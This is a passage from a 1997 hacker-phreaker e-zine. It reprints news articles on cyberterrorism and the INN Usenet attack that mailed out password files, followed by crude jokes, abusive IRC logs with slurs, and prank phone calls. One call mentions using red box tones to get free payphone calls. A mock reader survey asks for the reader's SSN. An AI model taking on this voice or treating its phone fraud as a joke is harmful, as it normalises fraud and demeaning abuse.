the Commission on Critical Infrastructure Protection is set to issue a report on the possible dangers of such cyber terrorism. The commission's goal is to predict the targets, anticipate the methods that might be used and figure out defenses. "We need to all be slightly paranoid, and it's good to start thinking this way about the threats -- the inside and the outside threats," says Ron Skelton of the Electric Power Research Institute, an organization of electric utilities. The stakes are high. For example, air traffic controllers, linked electronically, escort plane loads of passengers from city to city. Since the days of the telegraph, railroads have used remote data to safely shuttle trains from track to track. If those systems are compromised, trains and planes could crash. "We have identified more than 100 foreign nations" capable of "information warfare," Brooks says. Basic steps can counter threat Brooks wants a centralized national reporting agency to monitor the risks and coordinate reactions. And he says it should be established sooner rather than later. In the meantime, some of the early solutions to cyber terrorism appear to be fairly basic: Separate systems. Air traffic controllers use at least three independent systems, instead of a single system, to land a plane. Isolate circuits. Data at the San Francisco command center of Pacific Gas and Electric runs down private lines that do not go through hacker-accessible telephone switching systems, as voice calls do. Encrypt data. This is particularly useful in situations where redundant systems or isolated circuitry isn't feasible. "Encryption is probably the single most powerful tool that we could employ to protect ourselves in cyberspace," says Jim Bidzos of RSA Data Security. San Francisco bureau chief Greg Lefevre contributed to this report. _____________________________________________________________ Usenet Servers under Assault Michael Stutz 6:04pm 17.Mar.97.PST One of the largest automated attacks against Internet servers since 1988 began Saturday and continued into Monday. Attacks on Monday marked the sixth attempt at cracking potentially thousands of Usenet news servers, after four such attacks on Saturday and one on Sunday. Utilizing a well-known bug in InterNetNews server (INN), a complete and very popular Usenet news server package, an unidentified party posted four Usenet control messages on Saturday that mail copies of the password file and other information about a system. Saturday's attacks mailed the files to a machine in Europe owned by IBM. However, messages on Sunday and Monday were sent to different addresses - a machine at Rice University and a corporate machine in Germany. The message headers were spoofed so that they appeared to have originated from David C. Lawrence, a well-known Usenet administrator who oversees the creation of hierarchies. The attack works by gaining access to a news server via a hole in INN. The hole affects all versions of INN up to 1.5. INN 1.5.1, distributed since December 1996, remains unaffected. Patches are available from James Brister at the Internet Software Consortium, where INN is maintained. Brister concurred that the bug is nothing new, saying that the fixes have been available for some time. These attacks succeeded because not all news administrators have updated their systems. Matt Power, a post-doctoral associate at MIT, had written a patch that fixes the security hole, originally making it public two years ago. "I finally got them to include it in the distribution last December," he said. "The [attacker's] script copies the system's password file along with four other files and emails them to a remote address," said Power. With easily obtained software, the attacker could then attempt to crack one-way encrypted Unix user passwords with brute force. The other files - the system's inetd.conf file and output of the "uname" and "who" commands - could provide valuable information to hack the system in other ways, Power said. The bug involved was just recently reported in a CERT advisory dated 20 February - presumably long enough for the cracker to have exploited it but possibly not long enough for news administrators to have fixed their software. Smaller or understaffed operations, where sysadmins may not have yet heard of the bug or implemented the fix, are especially vulnerable. Power likens this sort of attack to one of the Net's most notorious and widespread attacks. "It is rare to hear of a successful attempt to automate the penetration of [probably] thousands of servers throughout the Internet," he said in an email to Wired News. "I don't know of any similar event that has taken place since the Robert T. Morris Internet worm of 2 November 1988." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Usenet News Servers Take a Beating by Michael Stutz 7:59pm 18.Mar.97.PST -- The bombardment of Usenet news servers across the Internet that began Saturday continued Tuesday, and while a student at Rice University had been identified in connection with the attacks, it was not yet known whether this was a prank or if the attacker had malicious intent. The machines were attacked via a well-known hole in the interpretation of Usenet control messages, which normally send information to individual news servers. The hole exploited a bug in popular news server software that allowed the messages to contain commands to be executed on the news server machine. Though the hole is a known bug with a published fix, a great deal of machines have been compromised. Many Usenet administrators may still be unaware of the problem. CERT, the Computer Emergency Response Team, issued a special bulletin Tuesday to reach more administrators. "At this time [Monday], 40 sites were known to have been compromised," said CERT's Terence McGillen. "As of [Tuesday], that number is up to 130. Right now, the CERT team is working in real time with administrators at the affected sites. As the days go on this week, we'll post updates as to the activity - it may die down, or it may not." McGillen was reluctant to speculate on the identity of the perpetrator. "We don't focus on that," he said. "We're not concerned in who the intruders were - just in the means they used to attack the sites." The attack emailed a machine's encrypted password file and other sensitive information to a remote address - one of which had been an obviously hacked account at Rice University in Houston, Texas. Officials at Rice University said they had found their man. "We do know who it is and will be taking appropriate steps," said Kathryn Costello, a university vice president. "We caught him thanks to all of the security measures we had implemented - it was a good test case for us, actually. We knew what terminal he was working at and were able to quickly identify him." His name has not been released. "The Rice news server was the point of attack," Costello said. "This could not have affected other university data because it is a standalone system kept separate from the rest of our computing facilities," she said. There has been no reported further compromise to these systems as a result of attack, but some administrators tested the security hole in question, causing more of the system-cracking control messages to be broadcast to all of Usenet's servers. One of those additional messages was possibly from another "real" attacker, said David C. Lawrence, the news administrator whose email identity was spoofed by the cracker. "[While] several later attacks were really administrators who let their well-meaning tests escape to the world, a couple of attacks have not yet been classified; at least one of them looks more like a real copycat attack than an innocent mistake." In order to gain unauthorized access to any of the attacked systems, the cracker would first have to run software to break the password information. So far, no administrators are aware of any such further compromise on their systems. "I have talked to several dozen sites at this point, well over a hundred," said Lawrence. "None have yet reported any additional compromise stemming from this attack. A significant factor in this is that the password file delivery destination machines in the original attack - two hosts in IBM Sweden's network - were unreachable from pretty much the time that the attack began," he said. Speaking of the possible copycat attack, Lawrence said it was too early to speculate whether the person would receive anything he could use before being nabbed, anyway. "First he has to break some passwords, then he has to contact the machine that has the account for the broken password, if he can get past their firewall and any additional security guards in place," he said. Things could have been worse. While these attacks seem to be just mailing a copy of the password file to an outside email address - presumably to be later cracked with brute force - virtually any system command could be performed, including the erasing of system data. This is clearly a serious hole. "It was characterized as an attack on the infrastructure, which I would say is serious," said McGillen. "This problem has been around for a while, it's just that [network administrators at these sites] are swamped with work. We don't expect this to go away overnight." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ [Article provided by Keystroke] Man waits 20 years for phone line but dies before getting it BUCHAREST, Romania (AP) -- Romanians are used to waiting a long time for a telephone. But 20 years for a dialtone was too long for Constantin Coltea. Coltea, who died last year, applied for a telephone line in 1977. The state telephone company, Romtelecom, responded this month, according to the Evenimentul Zilei daily. In its letter, Romtelecom told Coltea to confirm within 15 days that he still wanted the line or his request would be dropped. Coltea's 81-year-old widow, Caliopi, said she no longer can afford it, living on a $14 monthly pension. Lidia Toboc, a Romtelecom spokeswoman, could not confirm Coltea's case, but said there were two cases a year ago involving applicants who waited 15 years for their service. Since then, she said, "our management has been trying to resolve long-delayed applications." Bribes of up to several hundred dollars are common in Romania to get a line installed more swiftly. The government plans to privatize 30 percent of the phone company. _____________________________________________________________ [This editorialised article is courtesy of ec|ipse & Keystroke, they don't know who it was that added the top 10 list. I know this has nothing to do with hacking, phreaking, etc, but it's too damn funny not to publish.] Subject: Only in California... (fwd) You wanted raunchy? You got it!...times three! Here's one for the archives... This is an actual article from the LA Times: "In retrospect, lighting the match was my big mistake. But I was only trying to retrieve the gerbil," Eric Tomaszewski told bemused doctors in the Severe Burns Unit of Salt Lake City Hospital. Tomaszewski and his homosexual partner Andrew "Kiki" Farnum had been admitted for emergency treatment after a felching session had fone seriously wrong. "I pushed a cardboard tube up his rectum and slipped Raggot, our gerbil, in," he explained. "As usual, Kiki shouted out 'Armageddon', my cue that he'd had enough. I tried to retrieve Raggot but he wouldn't come out again, so I peered into the tube and struck a matche, thinking the light might attract him." At a hushed press conference, a hospital spokesman described what happened hext. "The match ignited a pocket of intestinal gas and a flame shot out of the tube, igniting Mr. Tomaszewski's hair and severely burning his face. It also set fire to the gerbil's fur and whiskers which in turn ignited a larger pocket of gas further up the intestine, propelling the rodent out like a cannonball." Tomaszewski suffered second degree burns and a broken nose from the impact of the gerbil, while Farnum suffered first and second degree burns to his anus and lower intestinal tract. OK, here's the top ten things that scare me the most in reading this story: 10. "I pushed the cardboard tube up his rectum..." Ouch!!! 9. "So I peered into the tube..." Aaaaaaahhhhhh! I'm sorry, but that's like looking through a telescope into Hell. I'd rather use binoculars to stare at the sun. 8. That poor gerbil (who obviously suffers from low self-esteem) being shot out of the guy's anus like Rocky the Flying Squirrel on Rocky and Bullwinkle. 7. Suffering a broken nose from a gerbil being launched out of someone's anus. I'm just guessing, but I seriously doubt said gerbil was springtime fresh after his little journey into Kiki's 'tunnel of love'. 6. People walking around with these volcanic-like pockets of gas in their rectums. 5. People who do this kind of thing and then admit what they were doing when taken to the emergency room. Sorry, but I think I would have made up a story about a gang of roving, pyromaniac, anal sex fiends breaking into my house and sodomizing me with a charcoal lighter before I admitted the truth. Call me old fashioned, but I just can't imagine looking at a doctor and saying, "Well Doc, it's like this. See, we have this gerbil named Raggot and we took this cardboard tube..." 4. "First and second degree burns to the anus". Wouldn't this make the burning itch and discomfort of hemorrhoids a welcome relief? How does one ever take a healthy poop after something like that? And the smell of burning anus must be in the top five most horrible scents on the face of God's green earth. 3. People name "Kiki" which is obviously a Polynesian word for 'idiotic white men who insert rodents up their butts.' 2. What kind of a hospital would hold a press conference on this?? 1. This happened in Salt Lake City. What kind of people are those Mormons?? (I'm starting to get a whole new image of the Osmond family) _____________________________________________________________ ©1997 HAVOC Bell Systems Publishing No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. [Unless you're leet, then it's ok. Well, just so long as you don't plain copy the zine. If you wanna take this to the copy center and blow it up and put in on the ceiling above your bed, we're not gonna try and stop you.] _____________________________________________________________ ------------------- --=[Reader Survey]=-- The HAVOC Technical Journal ------------------- [This survey is designed to help us better suit our magazine to the reader, or we may just be trying to get a good laugh, but we haven't decided yet.] Name: M/F: Age: Occupation/grade: City: State: Zip Code: Country: Area Code: SSN: [reference purposes only ;)] Why are you reading this? Where'd you get it? I am into: [ ] Hacking [ ] Phreaking [ ] Cracking [ ] Warez [ ] Coding (any) [ ] Anarchy [ ] Carding [ ] Law enforcement [ ] Public education I am guilty of the following: [ ] Eating paint chips [ ] Being the leader of a cult of programmers who intend to commit suicide [ ] Posession or intent to distribute THTJ [ ] A misdemeanor (if so, describe) [ ] A felony (if so, describe) [ ] Physically attacking bell employees [ ] Working for a phone company On a scale of 1 - 10, with 10 being leet, 0 being lame, I am best described as: [Send all replies to mazer@cycat.com] _____________________________________________________________ -------------- --=[IRC logs]=-- Humorous adventures in IRC -------------- *** Your nick is now Sub-Male *** Now talking in #freebsd > is this a sex channel ? but the new one will be a package deal Uuuh, one 9-gig drive is not good *** You were kicked by W ((WyzeOne) idiot) #freebsd unable to rejoin channel (you're banned!) _____________________________________________________________ [This could very well be the definition of 'AOL lamer' used in Webster's, courtesy of Scud-O.] CuM On BiAtCh! U wAnT Me TO PulL ThE InSiDe HaCk? I SAID NO 3reet teXt f00l BiTcH gee you are erret.... hackers2 CuM On BiTcH, Do U WaNT tO danCe? disco? U rEaLlY aRe A dUmb PiEcE Of ShIt ArEn'T U? no you are you just got taken over fool So DoNt CaRe AbOuT tHaT sHitTy ChAnNeL why the FUCK do you keep mixing caps? AlL I CaRe AbOuT Is FuCkInG U uP! go ahead what you got you little warez puppy? EvEr BeEn On AoL LamMah? nuke.exe? no... but i think you have SaTaN you know ANY thing about ip? satan? you dumb ass... satan is a prog fro cracking hosts dumb fuck what is a routing table? Im In WpSx BiTcH aNd U ArE On SoMe ShItTy ChAnNeL loOkS lIke U dA dUmB aSs excuse me? cant tell what ya wrote with all those ereet typing skills SaTaN iS tHe UlTiMaTe HaCkInG tOol DuMbAsS! Ha LaMaH U DoNt KnOw ShIt NO YOU dont know shit who wrote satan then? ThAtS sOmEtHiN To Be PrOuD Of Huh? DuMb FuCk WHO WROTE IT? btw, the boys in #hackers are loving this conversation ReAl Ppl DoNt GivE NaMes DumB FuCk R u ThAt sTuPiD? HeH LaMah! you havcent even USED satan have you? YeS I hAvE WHO WROTE IT? KnOw OnE KnOwS WhO wRoTe It LitTle ShIt you are a dumb fuck.. go ask someone ya lammah AlRiGht ThEn SmArT aSs WhO WrOtE It? dan farmer AlRiGhT sO Who Did SmArT Ass Fuck OFf u SoMe LiTtLe NeRd ThAt DoeSnT KnOw ShIt BiTcH no im the fuckin football captian _____________________________________________________________ [This log was provided by Keystroke from an incident shortly after TiSDaL had taken over the channel #-=|\|E\\'B|ES=-.] age/sex check 14 *** Joins: aVeNGe1 (Technology@modem3.cherryhill.wserv.com) *** Joins: |B0GS| (~revenge1@modem3.cherryhill.wserv.com) *** Joins: |D0OR| (Technology@modem3.cherryhill.wserv.com) *** Joins: aVeNGe6 (Technology@modem3.cherryhill.wserv.com) *** Joins: |F0ND| (Technology@modem3.cherryhill.wserv.com) *** Joins: |M0HO| (Technology@modem3.cherryhill.wserv.com) give me ops!!!!!!!! * Loom is 16/f nice bots clones even or i'll take them with my army!!!! wanna watch em all ping out? no not really take me baby come on Tisdal give him ops rape me rape me and my phriend * TecHnoKiD take TiSDaL and bites his neck!!!! *** Joins: |B0TH| (Technology@modem3.cherryhill.wserv.com) damn bot's in the wrong channel *** Quits: |D0OR| (G-lined) *** Quits: aVeNGe1 (G-lined) *** Quits: |M0HO| (G-lined) *** Quits: |B0TH| (G-lined) *** Quits: |F0ND| (G-lined) *** Quits: TecHnoKiD (G-lined) *** Quits: |B0GS| (G-lined) lol see what that gets ya _____________________________________________________________ [This log courtesy of Redtyde from #stupid.] watch youf fuckin mouth redtyde, that inappropriate for this channel alright.. why were the blond girl's titties square? because she forgot to take the tissues out of the box first uh ah HAhaHAhaHHaHaHaHhAhaHAhH holy shit that was hilarias! _____________________________________________________________ [Log of a conversation over getting ops in #phreak.] <|-A|pHa-|> hello > hi <|-A|pHa-|> do you need any shellz <|-A|pHa-|> i can you over a hundred shells <|-A|pHa-|> with the pw's <|-A|pHa-|> under one condition > wassat? <|-A|pHa-|> y'all gimme ops > well, that's against company policy > hold on, i'll talk to my manager and see what i can do <|-A|pHa-|> ok <|-A|pHa-|> also t offer i have a fserve > he says i don't get paid enough to do that > oh, ok what's on it? <|-A|pHa-|> and a web page <|-A|pHa-|> with the anarchist cookbook as a link. <|-A|pHa-|> also how to make bongs <|-A|pHa-|> and other pot smokin apartues > ok lemme relay this to the boss <|-A|pHa-|> um...NRA <|-A|pHa-|> alsp <|-A|pHa-|> also <|-A|pHa-|> and bass fishin links <|-A|pHa-|> mirc scripts <|-A|pHa-|> how to hack links > i don't see how he can turn this down > but he says our status quo would be in jeopardy, what's that mean? <|-A|pHa-|> i dunno <|-A|pHa-|> but relay the other stuff thats on my page to him <|-A|pHa-|> on my fserve i have mirc scripts,doom special edition,descent <|-A|pHa-|> um.. <|-A|pHa-|> programs for computers <|-A|pHa-|> irc programs > he's gonna have to talk to the regional manager, i had our secretary write it all down though, it sounds like a great deal in my opinion <|-A|pHa-|> ok thanx <|-A|pHa-|> if i have to go soon i will come back later for the answer > cool beans _____________________________________________________________ [IRC quote of the month] poof puts the "cocksucking moron" back in "cocksucking moron" _____________________________________________________________ ---------------------- --=[Funny Phonecalls]=-- The HAVOC Technical Journal ---------------------- [This is from a conversation between Scud-O and an AT&T ISP operator, which took place after Scud forgot his password. AT&T uses 'security words' to verify that you are who you say you are, and Scud's was 'fuck you'.] Sir I'm gonna need your security word. My security word? Well, that would be FUCK YOU! Uhh... correct... here is your password, and you need to change your security word sir, it's offensive. Oh yeah? Well fuck you! _____________________________________________________________ [_Electro_ made this call during lunchtime at school, and I believe the cafeteria food had sufficiently intoxicated him.] BC Tel Operator, How May I Help You? Yes, Hi. How are you doing today? Fine Thanks, How Can I help you? Well I was gonna pay with my calling card, but I can't seem to find it. Would you like me to insert a coin instead? Yes go ahead, insert your quarter. No prob (I PLAY MY RED BOX TONES WITHOUT PUTTING IN 5 CENTS FIRST) I am sorry sir you aren't putting in real coins Hmmm. . .Yes, But. . . enough about me, lets talk about you Excuse me? So how's life? How are the kids? Oh Yeah, Can You tell me whats wrong with my red box? Very Funny. . . _____________________________________________________________ [This interesting conversation occurred took place between shoe and the local bell operator.] YES? BELL SOUTH HERE! WE ARE SMART AND NOW ONLY HAVE 4 FONES IN THIS CITY THAT PEOPLE CAN REDBOX! Uhh, ok. Quit yelling I gotta ask you somethin. Go on... I need the number for Cuntflex. Excuse me? You heard me, Cuntflex. That number would be 581-FUCK-YOU Are you sure? I tried that and got your house. [Well, ok it didn't all happen, but he did ask her that, and she did give him that number.] _____________________________________________________________ ------------------------ ---------------------- --=[HAVOC Bell Systems]=-- --=[Acknowledgements]=-- ------------------------ ---------------------- Agrajag : PLA Michigan btm : Elite darkcyde : #phreak old-schooler digipimp : Co-conspirator Digital_X : Nemesis dr1x : Perverted bastard disc0re : Distributor ec|ipse : Hysterical bastard Keystroke : Submissions Editor Jisa : She's just a girl KungFuFox : Acting Editor RBCP : Funniest man alive memor : Ueberleet French phreak shoelace : Kewl fellow, #phreak'er psych0 : Writer WeatherM : Pan1k's right hand man REality : #phreak's southern accent yesimlame : No, he's not Redtyde : #phreak not so old-schooler #phreak : My home on IRC Scud-O : Mighty Editor in Chief Everyone who I get along with. theLURK3R : Coder guru UnaBomber : Tired of IRC _____________________________________________________________ This Month's Question: If a phreak calls from the forest, and nobody's around to keep him out of trouble, what're the odds that the call will be free? [The HAVOC Research Department of HAVOC Bell Systems has determined that there is a 90% chance that it will be. What about the other 10%, you may be wondering? Smokey the Bear fights more than fires, he's with the Gestapo.] _____________________________________________________________ Next Month: [My crystal ball is currently being refurbished, and cannot predict what is to come in THTJ10. Stay tuned for further details as they emerge.] Issue 10 is out May 1st! Send all articles for issue 10 to Keystroke at: keystroke@thepentagon.com ========================================================== = Is this copy of The HAVOC Technical Journal skunked? = = If this file doesn't read at 165968 bytes, it probably = = doesn't have a born on date! Get a fresh copy from our = = site at: http://www.geocities.com/SiliconValley/8805/ = ========================================================== --=[EOF]=--